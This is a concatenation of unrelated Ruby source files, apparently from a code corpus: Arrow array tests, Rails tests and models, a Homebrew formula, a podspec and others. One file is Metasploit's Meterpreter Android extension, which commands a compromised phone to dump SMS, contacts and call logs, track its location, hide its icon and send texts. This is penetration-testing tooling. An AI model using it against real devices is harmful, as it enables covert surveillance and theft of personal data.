assert_equal(values, target.values)
end
def test_int64
values = [
-(2 ** 63),
nil,
(2 ** 63) - 1,
]
target = build(Arrow::Int64Array.new(values))
assert_equal(values, target.values)
end
def test_uint64
values = [
0,
nil,
(2 ** 64) - 1,
]
target = build(Arrow::UInt64Array.new(values))
assert_equal(values, target.values)
end
def test_float
values = [
-1.0,
nil,
1.0,
]
target = build(Arrow::FloatArray.new(values))
assert_equal(values, target.values)
end
def test_double
values = [
-1.0,
nil,
1.0,
]
target = build(Arrow::DoubleArray.new(values))
assert_equal(values, target.values)
end
def test_binary
values = [
"\x00".b,
nil,
"\xff".b,
]
target = build(Arrow::BinaryArray.new(values))
assert_equal(values, target.values)
end
def test_string
values = [
"Ruby",
nil,
"\u3042", # U+3042 HIRAGANA LETTER A
]
target = build(Arrow::StringArray.new(values))
assert_equal(values, target.values)
end
def test_date32
values = [
Date.new(1960, 1, 1),
nil,
Date.new(2017, 8, 23),
]
target = build(Arrow::Date32Array.new(values))
assert_equal(values, target.values)
end
def test_date64
values = [
DateTime.new(1960, 1, 1, 2, 9, 30),
nil,
DateTime.new(2017, 8, 23, 14, 57, 2),
]
target = build(Arrow::Date64Array.new(values))
assert_equal(values, target.values)
end
def test_timestamp_second
values = [
Time.parse("1960-01-01T02:09:30Z"),
nil,
Time.parse("2017-08-23T14:57:02Z"),
]
target = build(Arrow::TimestampArray.new(:second, values))
assert_equal(values, target.values)
end
def test_timestamp_milli
values = [
Time.parse("1960-01-01T02:09:30.123Z"),
nil,
Time.parse("2017-08-23T14:57:02.987Z"),
]
target = build(Arrow::TimestampArray.new(:milli, values))
assert_equal(values, target.values)
end
def test_timestamp_micro
values = [
Time.parse("1960-01-01T02:09:30.123456Z"),
nil,
Time.parse("2017-08-23T14:57:02.987654Z"),
]
target = build(Arrow::TimestampArray.new(:micro, values))
assert_equal(values, target.values)
end
def test_timestamp_nano
values = [
Time.parse("1960-01-01T02:09:30.123456789Z"),
nil,
Time.parse("2017-08-23T14:57:02.987654321Z"),
]
target = build(Arrow::TimestampArray.new(:nano, values))
assert_equal(values, target.values)
end
def test_time32_second
unit = Arrow::TimeUnit::SECOND
values = [
Arrow::Time.new(unit, 60 * 10), # 00:10:00
nil,
Arrow::Time.new(unit, 60 * 60 * 2 + 9), # 02:00:09
]
target = build(Arrow::Time32Array.new(unit, values))
assert_equal(values, target.values)
end
def test_time32_milli
unit = Arrow::TimeUnit::MILLI
values = [
Arrow::Time.new(unit, (60 * 10) * 1000 + 123), # 00:10:00.123
nil,
Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1000 + 987), # 02:00:09.987
]
target = build(Arrow::Time32Array.new(unit, values))
assert_equal(values, target.values)
end
def test_time64_micro
unit = Arrow::TimeUnit::MICRO
values = [
# 00:10:00.123456
Arrow::Time.new(unit, (60 * 10) * 1_000_000 + 123_456),
nil,
# 02:00:09.987654
Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1_000_000 + 987_654),
]
target = build(Arrow::Time64Array.new(unit, values))
assert_equal(values, target.values)
end
def test_time64_nano
unit = Arrow::TimeUnit::NANO
values = [
# 00:10:00.123456789
Arrow::Time.new(unit, (60 * 10) * 1_000_000_000 + 123_456_789),
nil,
# 02:00:09.987654321
Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1_000_000_000 + 987_654_321),
]
target = build(Arrow::Time64Array.new(unit, values))
assert_equal(values, target.values)
end
def test_decimal128
values = [
BigDecimal("92.92"),
nil,
BigDecimal("29.29"),
]
data_type = Arrow::Decimal128DataType.new(8, 2)
target = build(Arrow::Decimal128Array.new(data_type, values))
assert_equal(values, target.values)
end
def test_decimal256
values = [
BigDecimal("92.92"),
nil,
BigDecimal("29.29"),
]
data_type = Arrow::Decimal256DataType.new(38, 2)
target = build(Arrow::Decimal256Array.new(data_type, values))
assert_equal(values, target.values)
end
def test_month_interval
values = [
1,
nil,
12,
]
target = build(Arrow::MonthIntervalArray.new(values))
assert_equal(values, target.values)
end
def test_day_time_interval
values = [
{day: 1, millisecond: 100},
nil,
{day: 2, millisecond: 300},
]
target = build(Arrow::DayTimeIntervalArray.new(values))
assert_equal(values, target.values)
end
def test_month_day_nano_interval
values = [
{month: 1, day: 1, nanosecond: 100},
nil,
{month: 2, day: 3, nanosecond: 400},
]
target = build(Arrow::MonthDayNanoIntervalArray.new(values))
assert_equal(values, target.values)
end
end
class ValuesArrayDictionaryArrayTest < Test::Unit::TestCase
include ValuesDictionaryArrayTests
def build(values)
values.dictionary_encode
end
end
class ValuesChunkedArrayDictionaryArrayTest < Test::Unit::TestCase
include ValuesDictionaryArrayTests
def build(values)
Arrow::ChunkedArray.new([values.dictionary_encode])
end
end
| 23.711656 | 77 | 0.623933 |
1ac1319a8c04079d5380df467717c30f1f8aeb24 | 820 | # frozen_string_literal: true
require 'test_helper'
class DailiesControllerTest < ActionDispatch::IntegrationTest
setup do
@daily = dailies(:one)
end
test "should get index" do
get dailies_url, as: :json
assert_response :success
end
test "should create daily" do
assert_difference('Daily.count') do
post dailies_url, params: { daily: { } }, as: :json
end
assert_response 201
end
test "should show daily" do
get daily_url(@daily), as: :json
assert_response :success
end
test "should update daily" do
patch daily_url(@daily), params: { daily: { } }, as: :json
assert_response 200
end
test "should destroy daily" do
assert_difference('Daily.count', -1) do
delete daily_url(@daily), as: :json
end
assert_response 204
end
end
| 20 | 63 | 0.673171 |
916a85f15dec5de211e71dc6639f5bffd691826f | 732 | #Fedena
#Copyright 2011 Foradian Technologies Private Limited
#
#This product includes software developed at
#Project Fedena - http://www.projectfedena.org/
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
class Country < ActiveRecord::Base
end
| 34.857143 | 73 | 0.784153 |
eddccdeff57e6862804a57ff7592832c98294234 | 130 | class AnnotationParsedType < ActiveRecord::Base
belongs_to :annotation
validates_presence_of :parsed_type, :annotation
end
| 21.666667 | 49 | 0.815385 |
6a98398a1d4644d9adad2122645fd8a9dc80ad6a | 10,844 | #!/usr/bin/env ruby
#
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/android/tlv'
require 'rex/post/meterpreter/packet'
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/channels/pools/stream_pool'
module Rex
module Post
module Meterpreter
module Extensions
module Android
###
# Android extension - set of commands to be executed on android devices.
# extension by Anwar Mohamed (@anwarelmakrahy)
###
class Android < Extension
COLLECT_TYPE_WIFI = 1
COLLECT_TYPE_GEO = 2
COLLECT_TYPE_CELL = 3
COLLECT_ACTION_START = 1
COLLECT_ACTION_PAUSE = 2
COLLECT_ACTION_RESUME = 3
COLLECT_ACTION_STOP = 4
COLLECT_ACTION_DUMP = 5
COLLECT_TYPES = {
'wifi' => COLLECT_TYPE_WIFI,
'geo' => COLLECT_TYPE_GEO,
'cell' => COLLECT_TYPE_CELL,
}
COLLECT_ACTIONS = {
'start' => COLLECT_ACTION_START,
'pause' => COLLECT_ACTION_PAUSE,
'resume' => COLLECT_ACTION_START,
'stop' => COLLECT_ACTION_STOP,
'dump' => COLLECT_ACTION_DUMP
}
def initialize(client)
super(client, 'android')
# Alias the following things on the client object so that they
# can be directly referenced
client.register_extension_aliases(
[
{
'name' => 'android',
'ext' => self
}
])
end
def collect_actions
return @@collect_action_list ||= COLLECT_ACTIONS.keys
end
def collect_types
return @@collect_type_list ||= COLLECT_TYPES.keys
end
def device_shutdown(n)
request = Packet.create_request('android_device_shutdown')
request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n)
response = client.send_request(request)
response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
end
def set_audio_mode(n)
request = Packet.create_request('android_set_audio_mode')
request.add_tlv(TLV_TYPE_AUDIO_MODE, n)
response = client.send_request(request)
end
def interval_collect(opts)
request = Packet.create_request('android_interval_collect')
request.add_tlv(TLV_TYPE_COLLECT_ACTION, COLLECT_ACTIONS[opts[:action]])
request.add_tlv(TLV_TYPE_COLLECT_TYPE, COLLECT_TYPES[opts[:type]])
request.add_tlv(TLV_TYPE_COLLECT_TIMEOUT, opts[:timeout])
response = client.send_request(request)
result = {
headers: [],
collections: []
}
case COLLECT_TYPES[opts[:type]]
when COLLECT_TYPE_WIFI
result[:headers] = ['Last Seen', 'BSSID', 'SSID', 'Level']
result[:entries] = []
records = {}
response.each(TLV_TYPE_COLLECT_RESULT_GROUP) do |g|
timestamp = g.get_tlv_value(TLV_TYPE_COLLECT_RESULT_TIMESTAMP)
timestamp = Time.at(timestamp).to_datetime.strftime('%Y-%m-%d %H:%M:%S')
g.each(TLV_TYPE_COLLECT_RESULT_WIFI) do |w|
bssid = w.get_tlv_value(TLV_TYPE_COLLECT_RESULT_WIFI_BSSID)
ssid = w.get_tlv_value(TLV_TYPE_COLLECT_RESULT_WIFI_SSID)
key = "#{bssid}-#{ssid}"
if !records.include?(key) || records[key][0] < timestamp
# Level is passed through as positive, because UINT
# but we flip it back to negative on this side
level = -w.get_tlv_value(TLV_TYPE_COLLECT_RESULT_WIFI_LEVEL)
records[key] = [timestamp, bssid, ssid, level]
end
end
end
records.each do |k, v|
result[:entries] << v
end
when COLLECT_TYPE_GEO
result[:headers] = ['Timestamp', 'Latitude', 'Longitude']
result[:entries] = []
records = {}
response.each(TLV_TYPE_COLLECT_RESULT_GROUP) do |g|
timestamp = g.get_tlv_value(TLV_TYPE_COLLECT_RESULT_TIMESTAMP)
timestamp = Time.at(timestamp).to_datetime.strftime('%Y-%m-%d %H:%M:%S')
g.each(TLV_TYPE_COLLECT_RESULT_GEO) do |w|
lat = w.get_tlv_value(TLV_TYPE_GEO_LAT)
lng = w.get_tlv_value(TLV_TYPE_GEO_LONG)
result[:entries] << [timestamp, lat, lng]
end
end
when COLLECT_TYPE_CELL
result[:headers] = ['Timestamp', 'Cell Info']
result[:entries] = []
records = {}
response.each(TLV_TYPE_COLLECT_RESULT_GROUP) do |g|
timestamp = g.get_tlv_value(TLV_TYPE_COLLECT_RESULT_TIMESTAMP)
timestamp = Time.at(timestamp).to_datetime.strftime('%Y-%m-%d %H:%M:%S')
g.each(TLV_TYPE_COLLECT_RESULT_CELL) do |cell|
cell.each(TLV_TYPE_CELL_ACTIVE_GSM) do |info|
cid = info.get_tlv_value(TLV_TYPE_CELL_CID)
lac = info.get_tlv_value(TLV_TYPE_CELL_LAC)
psc = info.get_tlv_value(TLV_TYPE_CELL_PSC)
info = sprintf("cid=%d lac=%d psc=%d", cid, lac, psc)
result[:entries] << [timestamp, "GSM: #{info}"]
end
cell.each(TLV_TYPE_CELL_ACTIVE_CDMA) do |info|
bid = info.get_tlv_value(TLV_TYPE_CELL_BASE_ID)
lat = info.get_tlv_value(TLV_TYPE_CELL_BASE_LAT)
lng = info.get_tlv_value(TLV_TYPE_CELL_BASE_LONG)
net = info.get_tlv_value(TLV_TYPE_CELL_NET_ID)
sys = info.get_tlv_value(TLV_TYPE_CELL_SYSTEM_ID)
info = sprintf("base_id=%d lat=%d lng=%d net_id=%d sys_id=%d", bid, lat, lng, net, sys)
result[:entries] << [timestamp, "CDMA: #{info}"]
end
cell.each(TLV_TYPE_CELL_NEIGHBOR) do |w|
net = w.get_tlv_value(TLV_TYPE_CELL_NET_TYPE)
cid = w.get_tlv_value(TLV_TYPE_CELL_CID)
lac = w.get_tlv_value(TLV_TYPE_CELL_LAC)
psc = w.get_tlv_value(TLV_TYPE_CELL_PSC)
sig = w.get_tlv_value(TLV_TYPE_CELL_RSSI) * -1
inf = sprintf("network_type=%d cid=%d lac=%d psc=%d rssi=%d", net, cid, lac, psc, sig)
result[:entries] << [timestamp, inf]
end
end
end
end
result
end
def dump_sms
sms = []
request = Packet.create_request('android_dump_sms')
response = client.send_request(request)
response.each(TLV_TYPE_SMS_GROUP) do |p|
sms << {
'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_TYPE).value),
'address' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_ADDRESS).value),
'body' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_BODY).value).squish,
'status' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_STATUS).value),
'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_DATE).value)
}
end
sms
end
def dump_contacts
contacts = []
request = Packet.create_request('android_dump_contacts')
response = client.send_request(request)
response.each(TLV_TYPE_CONTACT_GROUP) do |p|
contacts << {
'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CONTACT_NAME).value),
'email' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_EMAIL)),
'number' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_NUMBER))
}
end
contacts
end
def geolocate
loc = []
request = Packet.create_request('android_geolocate')
response = client.send_request(request)
loc << {
'lat' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LAT).value),
'long' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LONG).value)
}
loc
end
def dump_calllog
log = []
request = Packet.create_request('android_dump_calllog')
response = client.send_request(request)
response.each(TLV_TYPE_CALLLOG_GROUP) do |p|
log << {
'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NAME).value),
'number' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NUMBER).value),
'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DATE).value),
'duration' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DURATION).value),
'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_TYPE).value)
}
end
log
end
def check_root
request = Packet.create_request('android_check_root')
response = client.send_request(request)
response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
end
def hide_app_icon
request = Packet.create_request('android_hide_app_icon')
response = client.send_request(request)
response.get_tlv_value(TLV_TYPE_ICON_NAME)
end
def activity_start(uri)
request = Packet.create_request('android_activity_start')
request.add_tlv(TLV_TYPE_URI_STRING, uri)
response = client.send_request(request)
if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value
return nil
else
return response.get_tlv(TLV_TYPE_ACTIVITY_START_ERROR).value
end
end
def set_wallpaper(data)
request = Packet.create_request('android_set_wallpaper')
request.add_tlv(TLV_TYPE_WALLPAPER_DATA, data)
response = client.send_request(request)
end
def send_sms(dest, body, dr)
request = Packet.create_request('android_send_sms')
request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest)
request.add_tlv(TLV_TYPE_SMS_BODY, body)
request.add_tlv(TLV_TYPE_SMS_DR, dr)
if dr == false
response = client.send_request(request)
sr = response.get_tlv(TLV_TYPE_SMS_SR).value
return sr
else
response = client.send_request(request, 30)
sr = response.get_tlv(TLV_TYPE_SMS_SR).value
dr = response.get_tlv(TLV_TYPE_SMS_SR).value
return [sr, dr]
end
end
def wlan_geolocate
request = Packet.create_request('android_wlan_geolocate')
response = client.send_request(request, 30)
networks = []
response.each(TLV_TYPE_WLAN_GROUP) do |p|
networks << {
'ssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_SSID).value),
'bssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_BSSID).value),
'level' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_LEVEL).value)
}
end
networks
end
def sqlite_query(dbname, query, writeable)
request = Packet.create_request('android_sqlite_query')
request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname)
request.add_tlv(TLV_TYPE_SQLITE_QUERY, query)
request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable)
response = client.send_request(request, 30)
error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR)
raise "SQLiteException: #{error_msg.value}" if error_msg
unless writeable
result = {
columns: [],
rows: []
}
data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP)
unless data.nil?
columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS)
result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row|
result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
end
end
result
end
end
end
end
end
end
end
end
| 32.178042 | 99 | 0.680284 |
bf88e8cc101929e1242bd2b205d071a2eec4d734 | 1,992 | module WebConsole
# A session lets you persist an +Evaluator+ instance in memory associated
# with multiple bindings.
#
# Each newly created session is persisted into memory and you can find it
# later by its +id+.
#
# A session may be associated with multiple bindings. This is used by the
# error pages only, as currently, this is the only client that needs to do
# that.
class Session
cattr_reader :inmemory_storage
@@inmemory_storage = {}
class << self
# Finds a persisted session in memory by its id.
#
# Returns a persisted session if found in memory.
# Raises NotFound error unless found in memory.
def find(id)
inmemory_storage[id]
end
# Create a Session from an binding or exception in a storage.
#
# The storage is expected to respond to #[]. The binding is expected in
# :__web_console_binding and the exception in :__web_console_exception.
#
# Can return nil, if no binding or exception have been preserved in the
# storage.
def from(storage)
if exc = storage[:__web_console_exception]
new(ExceptionMapper.new(exc))
elsif binding = storage[:__web_console_binding]
new([binding])
end
end
end
# An unique identifier for every REPL.
attr_reader :id
def initialize(bindings)
@id = SecureRandom.hex(16)
@bindings = bindings
@evaluator = Evaluator.new(bindings.first)
store_into_memory
end
# Evaluate +input+ on the current Evaluator associated binding.
#
# Returns a string of the Evaluator output.
def eval(input)
@evaluator.eval(input)
end
# Switches the current binding to the one at specified +index+.
#
# Returns nothing.
def switch_binding_to(index)
@evaluator = Evaluator.new(@bindings[index.to_i])
end
private
def store_into_memory
inmemory_storage[id] = self
end
end
end
| 27.666667 | 77 | 0.657129 |
5d632c04f7e8b8b48056299bae04bd70689f3079 | 2,888 | require 'fitting/statistics/not_covered_responses'
require 'fitting/statistics/analysis'
require 'fitting/statistics/measurement'
require 'fitting/records/unit/request'
require 'fitting/storage/white_list'
require 'fitting/records/documented/request'
module Fitting
class Statistics
class Template
def initialize(tested_requests, config)
@tested_requests = tested_requests
@config = config
end
def save
File.open(@config.stats_path, 'w') { |file| file.write(stats) }
File.open(@config.not_covered_path, 'w') { |file| file.write(not_covered) }
end
def stats
if @config.white_list.present? || @config.resource_white_list.present? || @config.include_resources.present?
[
['[Black list]', black_statistics].join("\n"),
['[White list]', white_statistics].join("\n"),
''
].join("\n\n")
else
[white_statistics, "\n\n"].join
end
end
def not_covered
Fitting::Statistics::NotCoveredResponses.new(white_measurement).to_s
end
def white_statistics
@white_statistics ||= Fitting::Statistics::Analysis.new(white_measurement)
end
def black_statistics
@black_statistics ||= Fitting::Statistics::Analysis.new(black_measurement)
end
def white_measurement
@white_measurement ||= Fitting::Statistics::Measurement.new(white_unit)
end
def black_measurement
@black_measurement ||= Fitting::Statistics::Measurement.new(black_unit)
end
def white_unit
@white_unit_requests ||= documented_requests_white.inject([]) do |res, documented_request|
res.push(Fitting::Records::Unit::Request.new(documented_request, @tested_requests))
end
end
def black_unit
@black_unit_requests ||= documented_requests_black.inject([]) do |res, documented_request|
res.push(Fitting::Records::Unit::Request.new(documented_request, @tested_requests))
end
end
def documented_requests_white
@documented_requests_white ||= documented.find_all(&:white)
end
def documented_requests_black
@documented_requests_black ||= documented.find_all do |request|
!request.white
end
end
def documented
@documented_requests ||= @config.tomogram.to_hash.inject([]) do |res, tomogram_request|
res.push(Fitting::Records::Documented::Request.new(tomogram_request, white_list.to_a))
end
end
def white_list
@white_list ||= Fitting::Storage::WhiteList.new(
@config.prefix,
@config.white_list,
@config.resource_white_list,
@config.include_resources,
@config.include_actions,
@config.tomogram.to_resources
)
end
end
end
end
| 30.723404 | 116 | 0.649931 |
3336fed8e5b6de64b0ef329ef768d8937807aae7 | 2,347 | class OsrmBackend < Formula
desc "High performance routing engine"
homepage "http://project-osrm.org/"
url "https://github.com/Project-OSRM/osrm-backend/archive/v5.8.0.tar.gz"
sha256 "305cc6182b4eac54af3e796534c0b43ca137edd64f71aafacfe6cc8772916ebf"
head "https://github.com/Project-OSRM/osrm-backend.git"
bottle do
cellar :any
sha256 "3605cd98988acdd7a4bd8d2db8aa75bc47862ce678ecf4b5adb530866b1a8ddf" => :sierra
sha256 "1d0c389259c621c52a973dcae456acc7e53637ccdbc847c259962223ca6f1303" => :el_capitan
end
# "invalid use of non-static data member 'offset'"
# https://github.com/Project-OSRM/osrm-backend/issues/3719
depends_on :macos => :el_capitan
depends_on "cmake" => :build
depends_on "boost"
depends_on "libstxxl"
depends_on "libxml2"
depends_on "libzip"
depends_on "lua"
depends_on "tbb"
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args
system "make"
system "make", "install"
end
pkgshare.install "profiles"
end
test do
(testpath/"test.osm").write <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<osm version="0.6">
<bounds minlat="54.0889580" minlon="12.2487570" maxlat="54.0913900" maxlon="12.2524800"/>
<node id="1" lat="54.0901746" lon="12.2482632" user="a" uid="46882" visible="true" version="1" changeset="676636" timestamp="2008-09-21T21:37:45Z"/>
<node id="2" lat="54.0906309" lon="12.2441924" user="a" uid="36744" visible="true" version="1" changeset="323878" timestamp="2008-05-03T13:39:23Z"/>
<node id="3" lat="52.0906309" lon="12.2441924" user="a" uid="36744" visible="true" version="1" changeset="323878" timestamp="2008-05-03T13:39:23Z"/>
<way id="10" user="a" uid="55988" visible="true" version="5" changeset="4142606" timestamp="2010-03-16T11:47:08Z">
<nd ref="1"/>
<nd ref="2"/>
<tag k="highway" v="unclassified"/>
</way>
</osm>
EOS
(testpath/"tiny-profile.lua").write <<-EOS.undent
function way_function (way, result)
result.forward_mode = mode.driving
result.forward_speed = 1
end
EOS
safe_system "#{bin}/osrm-extract", "test.osm", "--profile", "tiny-profile.lua"
safe_system "#{bin}/osrm-contract", "test.osrm"
assert File.exist?("#{testpath}/test.osrm"), "osrm-extract generated no output!"
end
end
| 37.854839 | 153 | 0.677887 |
913b228087c1439503ccebdd58972ab3255fbee5 | 41 | module OptClient
VERSION = "0.1.0"
end
| 10.25 | 19 | 0.682927 |
389a364824714c97a72a0dbbbb0851438fba4f63 | 1,558 | # frozen_string_literal: true
# Indexing provided by ActiveFedora
class DataIndexer
attr_reader :last_modified, :cocina
def initialize(metadata:, cocina:, **)
@last_modified = metadata.fetch('Last-Modified')
@cocina = cocina
end
def to_solr
{}.tap do |solr_doc|
Rails.logger.debug "In #{self.class}"
solr_doc[:id] = cocina.externalIdentifier
solr_doc['current_version_isi'] = cocina.version # Argo Facet field "Version"
solr_doc['obj_label_tesim'] = cocina.label
solr_doc['modified_latest_dttsi'] = last_modified.to_datetime.strftime('%FT%TZ')
# These are required as long as dor-services-app uses ActiveFedora for querying:
solr_doc['has_model_ssim'] = legacy_model
solr_doc['is_governed_by_ssim'] = legacy_apo
solr_doc['is_member_of_collection_ssim'] = legacy_collections
end.merge(WorkflowFields.for(druid: cocina.externalIdentifier, version: cocina.version))
end
def legacy_collections
case cocina.type
when Cocina::Models::Vocab.admin_policy, Cocina::Models::Vocab.collection
[]
else
Array(cocina.structural.isMemberOf).map { |col_id| "info:fedora/#{col_id}" }
end
end
def legacy_apo
"info:fedora/#{cocina.administrative.hasAdminPolicy}"
end
def legacy_model
case cocina.type
when Cocina::Models::Vocab.admin_policy
'info:fedora/afmodel:Dor_AdminPolicyObject'
when Cocina::Models::Vocab.collection
'info:fedora/afmodel:Dor_Collection'
else
'info:fedora/afmodel:Dor_Item'
end
end
end
| 29.961538 | 92 | 0.714377 |
38cef2ce422cf97580a420feeb5a8bc641193178 | 151 | # frozen_string_literal: true
class IndexBrandsOnName < ActiveRecord::Migration[6.1]
def change
add_index :brands, :name, unique: true
end
end
| 21.571429 | 54 | 0.754967 |
33b367fbbf9aab7709043d849c90e2ce5934adc4 | 125 | FactoryBot.define do
factory :announcement do
lecture { nil }
announcer { nil }
details { "MyText" }
end
end
| 15.625 | 26 | 0.64 |
1abd0e0818119a8e7006fa16978c615a20232034 | 342 | require 'json'
module Jekyll
module ToJsonFilter
def to_json(input)
input.to_json
end
end
module AddToHashFilter
def add_to_hash(input, key, value)
input[key] = value
input
end
end
end
Liquid::Template.register_filter(Jekyll::ToJsonFilter)
Liquid::Template.register_filter(Jekyll::AddToHashFilter)
| 18 | 57 | 0.719298 |
38fd3e6c1afcad0d49080dae2f2b41f2ce2e4c6a | 404 | module Check
def check_input_letter(letter)
if @q_letter.include?(letter)
input_true_letter(letter)
else
input_error_letter(letter)
end
input_all_letter(letter)
end
def check_win?
if print_true_letter.uniq.size == print_quest_letter.uniq.size
true
else
false
end
end
def end_attempt?
number_attempt == 0
end
end | 17.565217 | 67 | 0.641089 |
e8be5e61b51d4b3bcc2aafbbfa0eff04e60b183a | 1,542 |
score = rand(25) * 1000
a = 0
b =0
puts "Please enter Name:"
@name = gets.chomp
#initializes array of file contents
arr = IO.readlines("myfile.txt")
scores = Array.new(10)
names = Array.new(10)
#Splits File into Two arrays, one of scores, the other of Names
for i in 0..20
if i%2 == 1 then
scores[a] = arr[i]
a = a +1
else
names[b] = arr[i]
b = b +1
end
end
#Sorting Algorithm of bothing Arrays at same time
for i in 0..9
for j in (i+1)..9
if scores[i] < scores[j] then
num = scores[i]
name = names[i]
scores[i] = scores[j]
names[i] = names[j]
scores[j] = num
names[j] = name
end
end
end
#Checks score of player to insert into array
if score > scores[9].to_i then
scores[9] = score
names[9] = @name
end
#Sorts one more time, just in case
for i in 0..9
for j in (i+1)..9
if scores[i].to_i < scores[j].to_i then
num = scores[i]
name = names[i]
scores[i] = scores[j]
names[i] = names[j]
scores[j] = num
names[j] = name
end
end
end
#Places array into file, replacing old data
f2 = File.new("myfile.txt", "r+")
for i in 0..9
f2.puts names[i]
f2.puts scores[i]
end
#Shows Current High Scores
arr = IO.readlines("myfile.txt")
puts "*****Current High Scores*****"
k = 0
for i in 0..9
print i+1
print ")"
print arr[k]
print " "
k=k+1
print arr[k]
k=k+1
puts " "
end
| 18.141176 | 64 | 0.541505 |
fff3db132eba3993052350943da1a501807c1517 | 5,164 | #
# Be sure to run `pod spec lint Rvs_Viewer.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# βββ Spec Metadata ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "Rvs_Streamer"
s.version = "4.1.0"
s.summary = "iChano SDK for Streamer"
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = "iChano SDK for Streamer. This SDK can collect vedio add audio."
s.homepage = "https://github.com/OpenIchano/Rvs_Streamer.git"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# βββ Spec License βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = { :type => 'MIT', :file => "LICENSE" }
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
# βββ Author Metadata βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "KindDeath" => "[email protected]" }
# Or just: s.author = "gongyj"
# s.authors = { "gongyj" => "[email protected]" }
# s.social_media_url = "http://twitter.com/gongyj"
# βββ Platform Specifics βββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
# s.platform = :ios
s.platform = :ios, "7.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# βββ Source Location ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "https://github.com/OpenIchano/Rvs_Streamer.git", :tag => "4.1.0" }
# βββ Source Code ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
# s.source_files = "Classes", "Classes/**/*.{h,m}"
# s.exclude_files = "Classes/Exclude"
# s.public_header_files = "Classes/**/*.h"
# βββ Resources ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# βββ Project Linking ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
